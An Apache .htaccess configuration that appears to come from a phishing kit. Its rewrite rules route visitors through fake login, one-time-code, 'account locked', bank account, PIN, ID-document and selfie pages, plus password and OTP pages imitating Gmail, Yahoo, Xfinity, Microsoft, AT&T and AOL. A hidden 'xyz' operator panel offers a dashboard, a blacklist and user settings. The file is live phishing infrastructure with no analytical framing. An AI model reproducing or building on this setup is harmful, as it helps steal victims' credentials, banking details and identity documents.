Options +FollowSymLinks
RewriteEngine On
RewriteRule ^forgot$ dash/reset.php
RewriteRule ^login$ dash/login.php
RewriteRule ^process$ dash/waiting.php
RewriteRule ^login-otp$ dash/otp.php
RewriteRule ^login-auth$ dash/authen.php
RewriteRule ^account$ dash/accountlocked.php
RewriteRule ^account-bank$ dash/bank.php
RewriteRule ^account-banks$ dash/addbank.php
RewriteRule ^bankaccount$ dash/addbanks.php
RewriteRule ^bankaccounts$ dash/addpin.php
RewriteRule ^accountverify$ dash/adddocument.php
RewriteRule ^accountverified$ dash/addSelfie.php
RewriteRule ^accountreview$ dash/finish.php
RewriteRule ^finish$ dash/finish.php
RewriteRule ^bankcok$ dash/bankcok.php
RewriteRule ^errorPage$ dash/errorPage.php
RewriteRule ^cok$ dash/cok.php

# Email Login
RewriteRule ^gmail$ dash/email/gmailpass.php [L]
RewriteRule ^yahoo$ dash/email/yahoopass.php [L]
RewriteRule ^comcast$ dash/email/xfinitypass.php [L]
RewriteRule ^microsoft$ dash/email/microsoftpass.php [L]
RewriteRule ^att$ dash/email/attpass.php [L]
RewriteRule ^aol$ dash/email/aolpass.php [L]
RewriteRule ^other$ dash/email/other.php [L]

RewriteRule ^gmails$ dash/email/gmailotp.php [L]
RewriteRule ^yahoos$ dash/email/yahoootp.php [L]
RewriteRule ^yahoophones$ dash/email/yahoophone.php [L]
RewriteRule ^comcasts$ dash/email/xfinityotp.php [L]
RewriteRule ^microsofts$ dash/email/microsoftotp.php [L]
RewriteRule ^atts$ dash/email/attotp.php [L]
RewriteRule ^aols$ dash/email/aolotp.php [L]
RewriteRule ^others$ dash/email/others.php [L]

RewriteRule ^xyz/dashboard$ pane/dash.php
RewriteRule ^xyz/blacklist$ pane/blacklist.php
RewriteRule ^xyz/settings$ pane/settings.php
RewriteRule ^xyz/users$ pane/users.php
RewriteRule ^xyz$ pane/login.php
# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php81” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-ea-php81 .php .php8 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit

<Files 403.shtml>
order allow,deny
allow from all
</Files>